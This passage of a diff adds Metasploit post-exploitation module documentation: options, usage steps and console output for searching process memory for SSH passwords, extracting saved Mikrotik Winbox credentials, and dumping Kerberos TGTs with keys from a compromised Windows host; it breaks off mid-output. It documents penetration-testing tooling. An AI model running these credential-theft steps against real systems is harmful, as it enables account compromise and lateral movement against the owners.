+ minitar                   0.9                                      puppet_gem
+ minitest                  5.13.0                                   puppet_gem
+ mount                     2.37.2-4ubuntu3                          apt
+ multi_json                1.15.0                                   puppet_gem
+ mutex_m                   0.1.0                                    puppet_gem
+ ncurses-base              6.3-2ubuntu0.1                           apt
+ ncurses-bin               6.3-2ubuntu0.1                           apt
+ net-pop                   0.1.0                                    puppet_gem
+ net-smtp                  0.1.0                                    puppet_gem
+ net-ssh                   4.2.0                                    puppet_gem
+ net-telnet                0.2.0                                    puppet_gem
+ net-tools                 1.60+git20181103.0eebece-1ubuntu5        apt
+ netbase                   6.3                                      apt
+ observer                  0.1.0                                    puppet_gem
+ open3                     0.1.0                                    puppet_gem
+ openjdk-17-jre-headless   17.0.8.1+1~us1-0ubuntu1~22.04            apt
+ openjdk-8-jre-headless    8u382-ga-1~22.04.1                       apt
+ openssl                   3.0.2-0ubuntu1.12                        apt
+ optimist                  3.0.1                                    puppet_gem
+ ostruct                   0.2.0                                    puppet_gem
+ passwd                    1:4.8.1-2ubuntu2.1                       apt
+ perl                      5.34.0-3ubuntu1.2                        apt
+ perl-base                 5.34.0-3ubuntu1.2                        apt
+ perl-modules-5.34         5.34.0-3ubuntu1.2                        apt
+ power_assert              1.1.7                                    puppet_gem
+ prime                     0.1.1                                    puppet_gem
+ procps                    2:3.3.17-6ubuntu2                        apt
+ pstore                    0.1.0                                    puppet_gem
+ psych                     3.1.0                                    puppet_gem
+ puppet                    7.27.0                                   puppet_gem
+ puppet-agent              7.27.0-1jammy                            apt
+ puppet-resource_api       1.9.0                                    puppet_gem
+ puppet7-release           7.0.0-14jammy                            apt
+ puppet_forge              5.0.3                                    puppet_gem
+ puppetdb-termini          7.15.0-1jammy                            apt
+ puppetserver              7.14.0-1jammy                            apt
+ puppetserver-ca           2.6.0                                    puppet_gem
+ r10k                      4.0.0                                    puppet_gem
+ racc                      1.4.16                                   puppet_gem
+ rake                      13.0.1                                   puppet_gem
+ rdoc                      6.2.1.1                                  puppet_gem
+ readline                  0.0.2                                    puppet_gem
+ readline-ext              0.1.0                                    puppet_gem
+ reline                    0.1.5                                    puppet_gem
+ rexml                     3.2.3.1                                  puppet_gem
+ rss                       0.2.8                                    puppet_gem
+ ruby2_keywords            0.0.5                                    puppet_gem
+ scanf                     1.0.0                                    puppet_gem
+ sdbm                      1.0.0                                    puppet_gem
+ sed                       4.8-1ubuntu2                             apt
+ semantic_puppet           1.0.4                                    puppet_gem
+ sensible-utils            0.0.17                                   apt
+ singleton                 0.1.0                                    puppet_gem
+ stringio                  0.1.0                                    puppet_gem
+ strscan                   1.0.3                                    puppet_gem
+ sys-filesystem            1.4.4                                    puppet_gem
+ sysvinit-utils            3.01-1ubuntu1                            apt
+ tar                       1.34+dfsg-1ubuntu0.1.22.04.1             apt
+ test-unit                 3.3.4                                    puppet_gem
+ text                      1.3.1                                    puppet_gem
+ thor                      1.2.2                                    puppet_gem
+ timeout                   0.1.0                                    puppet_gem
+ tracer                    0.1.0                                    puppet_gem
+ ubuntu-keyring            2021.03.26                               apt
+ ucf                       3.0043                                   apt
+ uri                       0.10.0.2                                 puppet_gem
+ usrmerge                  25ubuntu2                                apt
+ util-linux                2.37.2-4ubuntu3                          apt
+ webrick                   1.6.1                                    puppet_gem
+ x11-common                1:7.7+23ubuntu2                          apt
+ xmlrpc                    0.3.0                                    puppet_gem
+ yaml                      0.1.0                                    puppet_gem
+ zlib                      1.1.0                                    puppet_gem
+ zlib1g                    1:1.2.11.dfsg-2ubuntu9.2                 apt
+
+[*] Post module execution completed
+```
@@ -0,0 +1,129 @@
+## Vulnerable Application
+
+This module allows for searching the memory space of running processes using Meterpreter's
+`stdapi_sys_process_memory_search` command for potentially sensitive data such as passwords.
+
+## Verification Steps
+
+1. Start `msfconsole`
+1. Get a Meterpreter session
+1. Do: `use post/multi/gather/memory_search`
+1. Do: `set SESSION <Session ID>`
+1. Do: `set PROCESS_NAMES_GLOB <process_names_regex>`
+1. Do: `set PROCESS_IDS <Process ID>`
+1. Do: `set REGEX <regex>`
+1. Do: `run`
+
+## Options
+
+### PROCESS_NAMES_GLOB
+
+Regular expression used to target processes. (default: `ssh.*`)
+
+### PROCESS_IDS
+
+Comma delimited process ID/IDs to search through. (default: `nil`)
+
+### REGEX
+
+Regular expression to search for within memory. (default: `publickey,password.*`)
+
+### MIN_MATCH_LEN
+
+The minimum number of bytes to match. (default: `5`)
+
+### MAX_MATCH_LEN
+
+The maximum number of bytes to match. (default: `127`)
+
+### REPLACE_NON_PRINTABLE_BYTES
+
+Replace non-printable bytes with ".". (default: `true`)
+
+### SAVE_LOOT
+
+Save the memory matches to loot. (default: `true`)
+
+
+## Scenarios
+
+### Windows 10 - OpenSSH_9.4p1, OpenSSL 3.1.2 1 Aug 2023
+
+In this scenario, the Windows target is connected to a different host using `ssh.exe` using the password `myverysecretpassword`:
+```
+msf6 post(multi/gather/memory_search) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                              Connection
+  --  ----  ----                     -----------                              ----------
+  3         meterpreter x64/windows  DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB  192.168.112.1:4444 -> 192.168.112.129:55513 (192.168.112.129)
+
+msf6 post(multi/gather/memory_search) > run session=-1 regex="publickey,password.*" process_ids='' process_names_glob="ssh.*"
+
+[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
+[*] Getting target processes...
+[*] Running against the following processes:
+        ssh.exe (pid: 4292)
+
+[*] Memory Matches for ssh.exe (pid: 4292)
+======================================
+
+ Match Address       Match Length  Match Buffer                                                                                    Memory Region Start  Memory Region Size
+ -------------       ------------  ------------                                                                                    -------------------  ------------------
+ 0x0000000A00060DF0  127           "publickey,password......3.......myverysecretpassword....................#.........#..........  0x0000000A00000000   0x0000000000090000
+                                   ...........S......................"
+
+[*] Post module execution completed
+```
+
+### Windows 10 - Python3 HTTP Server
+
+In this scenario, the Windows target is running the `http.server` module in Python:
+```
+msf6 post(multi/gather/memory_search) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                              Connection
+  --  ----  ----                     -----------                              ----------
+  3         meterpreter x64/windows  DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB  192.168.112.1:4444 -> 192.168.112.129:55513 (192.168.112.129)
+  
+msf6 post(multi/gather/memory_search) > run session=-1 regex="GET /.*" process_ids='' process_names_glob="python.*|[Ww]indows[Tt]erminal.*"
+
+[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
+[*] Getting target processes...
+[*] Running against the following processes:
+        WindowsTerminal.exe (pid: 9168)
+        python.exe (pid: 2816)
+
+[*] Memory Matches for WindowsTerminal.exe (pid: 9168)
+==================================================
+
+ Match Address       Match Length  Match Buffer                                                                                    Memory Region Start  Memory Region Size
+ -------------       ------------  ------------                                                                                    -------------------  ------------------
+ 0x00000121C3458649  127           "GET /.portable HTTP/1.1\" 200 -...::ffff:192.168.112.1 - - [17/Jan/2024 14:36:38] \"GET /favi  0x00000121C3449000   0x000000000001B000
+                                   con.ico HTTP/1.1\" 404 -..windows-ter"
+
+[*] Memory Matches for python.exe (pid: 2816)
+=========================================
+
+ Match Address       Match Length  Match Buffer                                                                                    Memory Region Start  Memory Region Size
+ -------------       ------------  ------------                                                                                    -------------------  ------------------
+ 0x0000013A0E3017D1  127           "GET /.portable HTTP/1.1\" 200 -.....:.....Q.:...................0.Q.:...0.Q.:.....Q.:.....Q.:  0x0000013A0E270000   0x00000000000FF000
+                                   ...pAR.:...pAR.:...0.Q.:...0.Q.:..."
+ 0x0000013A1063DC21  127           "GET /.portable HTTP/1.1\" 200 -...t-black.ico...`@l.:.....h.:..............&.............l.&.  0x0000013A105E0000   0x0000000000100000
+                                   ....l.&.....l.&.....l.&......k.:..."
+ 0x0000013A1063E5B1  127           "GET /.portable HTTP/1.1\" 200 -...b.l.e...o.....P.c.:...s.e.r.s.\\.w.i.n.1.0.\\.s.c.o.o.p.\\.  0x0000013A105E0000   0x0000000000100000
+                                   a.p.p.s.\\.w.i.n.d.o.w.s.-.t.e.r.m.i.n."
+ 0x0000013A1067EC41  127           "GET /Images/ HTTP/1.1\" 200 -...@.g.:...p..&....2.................012345........<li><a href=\  0x0000013A105E0000   0x0000000000100000
+                                   "defaults.json\">defaults.json</a></l"
+ 0x0000013A106CADD0  127           "GET /.portable HTTP/1.1...p&.............x..:...P...:...0.l.:....ta$.e$j..k.:... lk.:........  0x0000013A105E0000   0x0000000000100000
+                                   ...0.l.:......................&..."
+ 0x0000013A106CF940  127           "GET /.portable HTTP/1.1...........l.:...................Pf.&.....^.&......e.:................  0x0000013A105E0000   0x0000000000100000
+                                   ....Sn&....s.......P.l.:...p..&..."
+
+[*] Post module execution completed
+```
@@ -0,0 +1,37 @@
+## Vulnerable Application
+
+Any Windows host with a `meterpreter` session and Mikrotik Winbox installed.
+
+Winbox can be downloaded [here](https://mikrotik.com/download)
+
+### Installation Steps
+
+1. Download and open Mikrotik Winbox
+2. Enter a RouterOS device address into `Connect to`, username into `Login`, password into `Password` and check the flag `Keep Password`
+3. Click Connect
+
+## Verification Steps
+
+1. Get a `meterpreter` session on a Windows host.
+2. Do: `run post/windows/gather/credentials/winbox_settings`
+3. If any users in the system has a `Keep Password` enabled in Winbox, the credentials will be printed out.
+
+## Options
+
+### VERBOSE
+
+- By default verbose is turned off. When turned on, the module will show the HexDump of `settings.cfg.viw` files.
+
+## Scenarios
+
+```
+msf6 post(windows/gather/credentials/winbox_settings) > run
+
+[*] VERBOSE: false
+[*] Checking Default Locations...
+[*] C:\Users\Administrator\AppData\Roaming\Mikrotik\Winbox\settings.cfg.viw not found ....
+[*] Found File at C:\Users\FooBar\AppData\Roaming\Mikrotik\Winbox\settings.cfg.viw
+[+] Login: ThisIsUsername
+[+] Password: ThisIsPassword
+[*] Post module execution completed
+```
@@ -0,0 +1,405 @@
+Manage kerberos tickets on a compromised host. Different actions are available for different tasks. Kerberos tickets are
+associated with logon sessions which can be enumerated with the `ENUM_LUIDS` action. s
+
+## Options
+
+### LUID
+An optional logon session LUID to target in the DUMP_TICKETS and SHOW_LUID actions. The LUID is expressed in hex, e.g.
+`0x11223344`.
+
+### SERVICE
+An optional service name wildcard to target in the DUMP_TICKETS action. This option accepts wild cards. For example, to
+dump only TGTs use `krbtgt/*` and to only dump tickets for dc.msflab.local, use `*/dc.msflab.local`. Wildcards and 
+service names are case insensitive.
+
+## Actions
+
+### DUMP_TICKETS
+This action allows dumping kerberos tickets from a compromised host. These tickets are loaded into Metasploit's
+kerberos ticket cache when Metasploit is connected to a database. If the Meterpreter session is running with
+administrative privileges, then the tickets from all logon sessions can be dumped. If the Meterpreter session is not
+running with Administrative privileges then only the tickets from the current logon session / current user can be
+dumped. If the `LUID` option is set then only the tickets from that logon session will be dumped. Targeting a specific
+LUID with the `LUID` option requires administrative privileges.
+
+### ENUM_LUIDS
+This action will enumerate the LUIDs of all active logon sessions. Some basic information is printed for each LUID.
+
+### SHOW_LUID
+This action will show the LUID and some basic information about the current logon session unless the `LUID` option is
+set in which case that logon session is shown.
+
+## Scenarios
+
+In this case the operator lists the currently cached Kerberos tickets in the Metasploit database. After that the
+`DUMP_TICKETS` action is used with a service filter to dump the TGTs on the compromised host. Finally, the `klist`
+command is used again to show the newly added TGTs.
+
+```
+msf6 post(windows/manage/kerberos_tickets) > klist
+Kerberos Cache
+==============
+No tickets
+
+msf6 post(windows/manage/kerberos_tickets) > run SESSION=-1 SERVICE=krbtgt/*
+
+[*] LSA Handle: 0x000001efe1bf7270
+[*] LogonSession LUID: 0x00004bc1d 
+[*]   User:                  MSFLAB\DC$
+[*]   Session:               0
+[*]   AuthenticationPackage: Kerberos
+[*]   LogonType:             Network (3)
+[*]   LogonTime:             2023-08-23 08:33:17 -0400
+[*]   Ticket[0]
+[*]     TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135453_default_192.168.159.10_mit.kerberos.cca_948767.bin
+        Primary Principal: DC$@MSFLAB.LOCAL
+        Ccache version: 4
+        
+        Creds: 1
+          Credential[0]:
+            Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
+            Client: DC$@MSFLAB.LOCAL
+            Ticket etype: 18 (AES256)
+            Key: e515137250f072d44b7487c09b8033a34ff1c7e96ad20674007c255a0a8de2b0
+            Subkey: false
+            Ticket Length: 1006
+            Ticket Flags: 0x60a10000 (FORWARDABLE, FORWARDED, RENEWABLE, PRE_AUTHENT, CANONICALIZE)
+            Addresses: 0
+            Authdatas: 0
+            Times:
+              Auth time: 1969-12-31 19:00:00 -0500
+              Start time: 2023-08-23 08:33:17 -0400
+              End time: 2023-08-23 18:33:17 -0400
+              Renew Till: 2023-08-30 08:33:17 -0400
+            Ticket:
+              Ticket Version Number: 5
+              Realm: MSFLAB.LOCAL
+              Server Name: krbtgt/MSFLAB.LOCAL
+              Encrypted Ticket Part:
+                Ticket etype: 18 (AES256)
+                Key Version Number: 2
+                Cipher:
+                  L/csyZle+LDn1i7Yqci0vbZCHrjO8CeQXBSix3d1lCR66sR0Zq/ogR/6g3X8yGn9acvGjAtt29ZErQe4FA3ttZ6MA2p8QldvbQCvELLpQkOHKrmzd2YhWy5YxfbwzFpZT0OtFEB0gYW3AQuOyRKk5vCuljZH6bPaz77g8KUejFx80tJbmz6n2GLOzG8rcMiy/i/zYreG6TLnjZJgw3UVABFSjUKs20eSK2Le5OxSKfcBQTwaRp+BPdXWGbMNYWwTUntAZGC5G6DE9xglY0+T2D/9HFSWVesrnduMmzHR9NojQYezHJorMKh7m5/KeNEzuJUDLCkgX/Uscq8dc6XMaFH7aIsg5+nlAZBPTrYtkayun6AaTLJpqLg90ab3iYCZpvdCBKBPapg3271YVHe8i7OaDDJWXMNooi+6Jg+B1cnBRH9qQ5T2k7RQLMNez9P8dvuMkDmFpRz5KOJk+w+Mz6XFeu9g1Z4zXQ6msI060PrwvAENevTN9DKUWtDGBCQMTjBDm75sMA7Aq8KgBqKYUhP+CV+HzgFou4P1/t3l+udRBIYfQw68EHW2dQE/ZZR+oLPPHbCsbnpkp/rSFjdsl0E9Zm4upPty3M+sKd2fdZSLXs5CLBs5WeZmPrXHrHnyC/AnoLNQVTVCtv5EpM50BWooXWKHljLctHxN/W6ZXgqwZ4R7KNYIrtaAsmLrkq2K/z+zsuAWRoDKFtLWZMD9eqfsGi2bRBqPf74+mi1bPXL/1eWlUwmrjr5Buj4kvC8XB+wTRoAkSrjoAx7IglfSIKdW/5N3CX6G+smJWZCsrGIvouTzIzcpHCXgoaHypnm2B9G7yIwkDgpCFd4MW3t8ZrZXOjuReQ6Aiy9mXHlbReX9G3Xl0fj7z4cIKSV4YiyEkjXJE+eAT7GdtJEPFXJJw6Fxhdam+FL+SKVvu4kw+uvqfz72GDG24/KqM3/0L58M96oEd1LHnVoHwuPtfDA7xhvHDu8iYZOkOjDc5cwMCU0MmW5A1cijTuNfSeRRHx6xXLPKkIJH/5XWeg7BAG3lnlOgS/HKj+Uhti7fabZHUvXyGAdA7CJzZ2OUlZY6Acm9JU2EuUfFvnpEjAtasckDA43pb/r4ZNIZPxcq6gpgcdFpZIb8H7bbWdIIinDJfFkEunJ7E1TG9wSbX6j6JfThG31L7EBW+UPHlDa4k1wPFMP3lNgleVUBi0n24T1RBTb6c5W0Cw==
+[*] LogonSession LUID: 0x00001052b 
+[*]   User:                  Window Manager\DWM-1
+[*]   Session:               1
+[*]   AuthenticationPackage: Negotiate
+[*]   LogonType:             Interactive (2)
+[*]   LogonTime:             2023-08-23 08:32:38 -0400
+[*] LogonSession LUID: 0x00000aa83 
+[*]   User:                  \
+[*]   Session:               0
+[*]   AuthenticationPackage: NTLM
+[*]   LogonType:             UndefinedLogonType (0)
+[*]   LogonTime:             2023-08-23 08:32:27 -0400
+[-] Failed to call the authentication package. LsaCallAuthenticationPackage authentication package failed with: (0x00000520) ERROR_NO_SUCH_LOGON_SESSION: A specified logon session does not exist. It may already have been terminated.
+[*] LogonSession LUID: 0x0000ae359 
+[*]   User:                  MSFLAB\DC$
+[*]   Session:               0
+[*]   AuthenticationPackage: Kerberos
+[*]   LogonType:             Network (3)
+[*]   LogonTime:             2023-08-23 08:38:08 -0400
+[*] LogonSession LUID: 0x0000ae2d3 
+[*]   User:                  MSFLAB\DC$
+[*]   Session:               0
+[*]   AuthenticationPackage: Kerberos
+[*]   LogonType:             Network (3)
+[*]   LogonTime:             2023-08-23 08:38:08 -0400
+[*] LogonSession LUID: 0x00004fff8 
+[*]   User:                  MSFLAB\smcintyre
+[*]   Session:               1
+[*]   AuthenticationPackage: Negotiate
+[*]   LogonType:             Interactive (2)
+[*]   LogonTime:             2023-08-23 08:33:18 -0400
+[*] LogonSession LUID: 0x00004b823 
+[*]   User:                  MSFLAB\DC$
+[*]   Session:               0
+[*]   AuthenticationPackage: Kerberos
+[*]   LogonType:             Network (3)
+[*]   LogonTime:             2023-08-23 08:33:17 -0400
+[*] LogonSession LUID: 0x00000b7c4 
+[*]   User:                  Font Driver Host\UMFD-0
+[*]   Session:               0
+[*]   AuthenticationPackage: Negotiate
+[*]   LogonType:             Interactive (2)
+[*]   LogonTime:             2023-08-23 08:32:37 -0400
+[*] LogonSession LUID: 0x0001f3e4f 
+[*]   User:                  MSFLAB\DC$
+[*]   Session:               0
+[*]   AuthenticationPackage: Kerberos
+[*]   LogonType:             Network (3)
+[*]   LogonTime:             2023-08-23 09:42:34 -0400
+[*]   Ticket[0]
+[*]     TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135459_default_192.168.159.10_mit.kerberos.cca_126280.bin
+        Primary Principal: DC$@MSFLAB.LOCAL
+        Ccache version: 4
+        
+        Creds: 1
+          Credential[0]:
+            Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
+            Client: DC$@MSFLAB.LOCAL
+            Ticket etype: 18 (AES256)
+            Key: e515137250f072d44b7487c09b8033a34ff1c7e96ad20674007c255a0a8de2b0
+            Subkey: false
+            Ticket Length: 1006
+            Ticket Flags: 0x60a10000 (FORWARDABLE, FORWARDED, RENEWABLE, PRE_AUTHENT, CANONICALIZE)
+            Addresses: 0
+            Authdatas: 0
+            Times:
+              Auth time: 1969-12-31 19:00:00 -0500
+              Start time: 2023-08-23 08:33:17 -0400
+              End time: 2023-08-23 18:33:17 -0400
+              Renew Till: 2023-08-30 08:33:17 -0400
+            Ticket:
+              Ticket Version Number: 5
+              Realm: MSFLAB.LOCAL
+              Server Name: krbtgt/MSFLAB.LOCAL
+              Encrypted Ticket Part:
+                Ticket etype: 18 (AES256)
+                Key Version Number: 2
+                Cipher:
+                  L/csyZle+LDn1i7Yqci0vbZCHrjO8CeQXBSix3d1lCR66sR0Zq/ogR/6g3X8yGn9acvGjAtt29ZErQe4FA3ttZ6MA2p8QldvbQCvELLpQkOHKrmzd2YhWy5YxfbwzFpZT0OtFEB0gYW3AQuOyRKk5vCuljZH6bPaz77g8KUejFx80tJbmz6n2GLOzG8rcMiy/i/zYreG6TLnjZJgw3UVABFSjUKs20eSK2Le5OxSKfcBQTwaRp+BPdXWGbMNYWwTUntAZGC5G6DE9xglY0+T2D/9HFSWVesrnduMmzHR9NojQYezHJorMKh7m5/KeNEzuJUDLCkgX/Uscq8dc6XMaFH7aIsg5+nlAZBPTrYtkayun6AaTLJpqLg90ab3iYCZpvdCBKBPapg3271YVHe8i7OaDDJWXMNooi+6Jg+B1cnBRH9qQ5T2k7RQLMNez9P8dvuMkDmFpRz5KOJk+w+Mz6XFeu9g1Z4zXQ6msI060PrwvAENevTN9DKUWtDGBCQMTjBDm75sMA7Aq8KgBqKYUhP+CV+HzgFou4P1/t3l+udRBIYfQw68EHW2dQE/ZZR+oLPPHbCsbnpkp/rSFjdsl0E9Zm4upPty3M+sKd2fdZSLXs5CLBs5WeZmPrXHrHnyC/AnoLNQVTVCtv5EpM50BWooXWKHljLctHxN/W6ZXgqwZ4R7KNYIrtaAsmLrkq2K/z+zsuAWRoDKFtLWZMD9eqfsGi2bRBqPf74+mi1bPXL/1eWlUwmrjr5Buj4kvC8XB+wTRoAkSrjoAx7IglfSIKdW/5N3CX6G+smJWZCsrGIvouTzIzcpHCXgoaHypnm2B9G7yIwkDgpCFd4MW3t8ZrZXOjuReQ6Aiy9mXHlbReX9G3Xl0fj7z4cIKSV4YiyEkjXJE+eAT7GdtJEPFXJJw6Fxhdam+FL+SKVvu4kw+uvqfz72GDG24/KqM3/0L58M96oEd1LHnVoHwuPtfDA7xhvHDu8iYZOkOjDc5cwMCU0MmW5A1cijTuNfSeRRHx6xXLPKkIJH/5XWeg7BAG3lnlOgS/HKj+Uhti7fabZHUvXyGAdA7CJzZ2OUlZY6Acm9JU2EuUfFvnpEjAtasckDA43pb/r4ZNIZPxcq6gpgcdFpZIb8H7bbWdIIinDJfFkEunJ7E1TG9wSbX6j6JfThG31L7EBW+UPHlDa4k1wPFMP3lNgleVUBi0n24T1RBTb6c5W0Cw==
+[*] LogonSession LUID: 0x0001243b3 
+[*]   User:                  MSFLAB\DC$
+[*]   Session:               0
+[*]   AuthenticationPackage: Kerberos
+[*]   LogonType:             Network (3)
+[*]   LogonTime:             2023-08-23 08:47:47 -0400
+[*] LogonSession LUID: 0x0000003e5 
+[*]   User:                  NT AUTHORITY\LOCAL SERVICE
+[*]   Session:               0
+[*]   AuthenticationPackage: Negotiate
+[*]   LogonType:             Service (5)
+[*]   LogonTime:             2023-08-23 08:32:38 -0400
+[*] LogonSession LUID: 0x0000ae390 
+[*]   User:                  MSFLAB\DC$
+[*]   Session:               0
+[*]   AuthenticationPackage: Kerberos
+[*]   LogonType:             Network (3)
+[*]   LogonTime:             2023-08-23 08:38:08 -0400
+[*] LogonSession LUID: 0x0000ae320 
+[*]   User:                  MSFLAB\DC$
+[*]   Session:               0
+[*]   AuthenticationPackage: Kerberos
+[*]   LogonType:             Network (3)
+[*]   LogonTime:             2023-08-23 08:38:08 -0400
+[*] LogonSession LUID: 0x00000b7be 
+[*]   User:                  Font Driver Host\UMFD-1
+[*]   Session:               1
+[*]   AuthenticationPackage: Negotiate
+[*]   LogonType:             Interactive (2)
+[*]   LogonTime:             2023-08-23 08:32:37 -0400
+[*] LogonSession LUID: 0x00000b76e 
+[*]   User:                  Font Driver Host\UMFD-0
+[*]   Session:               0
+[*]   AuthenticationPackage: Negotiate
+[*]   LogonType:             Interactive (2)
+[*]   LogonTime:             2023-08-23 08:32:37 -0400
+[*] LogonSession LUID: 0x0000104e9 
+[*]   User:                  Window Manager\DWM-1
+[*]   Session:               1
+[*]   AuthenticationPackage: Negotiate
+[*]   LogonType:             Interactive (2)
+[*]   LogonTime:             2023-08-23 08:32:38 -0400
+[*] LogonSession LUID: 0x00000b77b 
+[*]   User:                  Font Driver Host\UMFD-1
+[*]   Session:               1
+[*]   AuthenticationPackage: Negotiate
+[*]   LogonType:             Interactive (2)
+[*]   LogonTime:             2023-08-23 08:32:37 -0400
+[*] LogonSession LUID: 0x0000003e7 
+[*]   User:                  MSFLAB\DC$
+[*]   Session:               0
+[*]   AuthenticationPackage: Negotiate
+[*]   LogonType:             UndefinedLogonType (0)
+[*]   LogonTime:             2023-08-23 08:32:26 -0400
+[*]   Ticket[0]
+[*]     TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_341258.bin
+        Primary Principal: DC$@MSFLAB.LOCAL
+        Ccache version: 4
+        
+        Creds: 1
+          Credential[0]:
+            Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
+            Client: DC$@MSFLAB.LOCAL
+            Ticket etype: 18 (AES256)
+            Key: 810290bb8e930190000e05de7abee1f095bfe29527cca5ad9320cf3d86260f08
+            Subkey: false
+            Ticket Length: 1006
+            Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
+            Addresses: 0
+            Authdatas: 0
+            Times:
+              Auth time: 1969-12-31 19:00:00 -0500
+              Start time: 2023-08-23 08:33:17 -0400
+              End time: 2023-08-23 18:33:17 -0400
+              Renew Till: 2023-08-30 08:33:17 -0400
+            Ticket:
+              Ticket Version Number: 5
+              Realm: MSFLAB.LOCAL
+              Server Name: krbtgt/MSFLAB.LOCAL
+              Encrypted Ticket Part:
+                Ticket etype: 18 (AES256)
+                Key Version Number: 2
+                Cipher:
+                  tLtOsjj8akj/iTEx/Kgidt9rW9sZ48SgEANNEpLhR1SmtI3/0e9Lq6oh35XWTKACrkFJGEOqSeBAaHwhArH2YyskGPadY2lL1qJI0zjhipeAZu4gWD4vpf2sKSL/ksOo9sthfxVMEVfq0QSxR37mPZwYI1LOyMcCOeckLGdHdlQCO7WwnbDpToyTq7TYzn13XmX0nyRFBIN436camSwYO/xRsWkhpVQKQIRgAjl7xCBMLT8/YGYangAASjBIxiXbXOtlj9zBwBjfA36cXz2yUp7MjC2kZLYI//xZZG1VVOa9nAG8vkkyi7GrXitG/m2X5s7YOG7XyvDOoC5yS7Yti+P2jGvPiWjAOSDmlwLolHSjeSIYCKwxK5Dm/LyMtUVtJRAb702FdI7lSH8oZCxQBQs92j3PKTBIMzz2+eY4r74Nemh+zIH86M4llhELhhyz86V9Utox9iURueY32LVieRIaTXmWXCGyopENrTt+LHPShBAk+Q8P3y+SGwVGxmm/CVKFN2R7IZNFiBxw627Vhw2pjFfVDjfsRV9mAvF6Axhks2aSO5rXZNZY1xW9iEbkRI3wnVYR9zgeSILxMNjyiVZvGFSllYnRWpDOqSe4n0/xw/ytD8gAHBYveBxzMPvTHN76Kcs1MGmhpsMdMBUo2UT4eeqBP//rXnuBtneb5maz0Ak+VwDZOf8Q76gcp66FIOGlRWPxpRgaCz2ISHeJ+istqRBm8gGbfqfHAbZM2PTzyyDHROuf3LgVyfhNUt8r7eYAgDCsfKBq6bq7O/KcQaBOfQN5yAgnt6CuAjyIqFaaXlsbQZ2D5s1p4WYUjrEpywWIoTQWLbCSYSAjOz+eYv50MQ3oE43hRQtg5eT0PCVmyG30VDfZDISq3Yj0hDMu20nuVuZ2cVvzccEBNgn9SRnQyYRRZQb6w9Zgs1/VYiY2SLZjmbYAo54TNDVJyseJ3Egl3Xp8BNccUkxZomgUOwP58q7XQk8lDzi4ApJMVJ0M8THDySVBJX2sB7oNn924fzghqW+wfzsXVnI2O9aLxzYnygHyp3h7ypt83sXyMTLD4tqEZ0DvcOvCoNnvis7VN8ZvvhLADoOxpJPALc8n+q70rfCdukZQpICUhLc16Z+JZJkGdAZtmi1Um+Cwy7lmBA+IvRp+abyklx19ulv55CbU7K8NAftJUOof/MgmAre+pOmwLofZgaSu7wVQ65fBeb8bjA==
+[*]   Ticket[1]
+[*]     TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_389858.bin
+        Primary Principal: DC$@MSFLAB.LOCAL
+        Ccache version: 4
+        
+        Creds: 1
+          Credential[0]:
+            Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
+            Client: DC$@MSFLAB.LOCAL
+            Ticket etype: 18 (AES256)
+            Key: 810290bb8e930190000e05de7abee1f095bfe29527cca5ad9320cf3d86260f08
+            Subkey: false
+            Ticket Length: 1006
+            Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
+            Addresses: 0
+            Authdatas: 0
+            Times:
+              Auth time: 1969-12-31 19:00:00 -0500
+              Start time: 2023-08-23 08:33:17 -0400
+              End time: 2023-08-23 18:33:17 -0400
+              Renew Till: 2023-08-30 08:33:17 -0400
+            Ticket:
+              Ticket Version Number: 5
+              Realm: MSFLAB.LOCAL
+              Server Name: krbtgt/MSFLAB.LOCAL
+              Encrypted Ticket Part:
+                Ticket etype: 18 (AES256)
+                Key Version Number: 2
+                Cipher:
+                  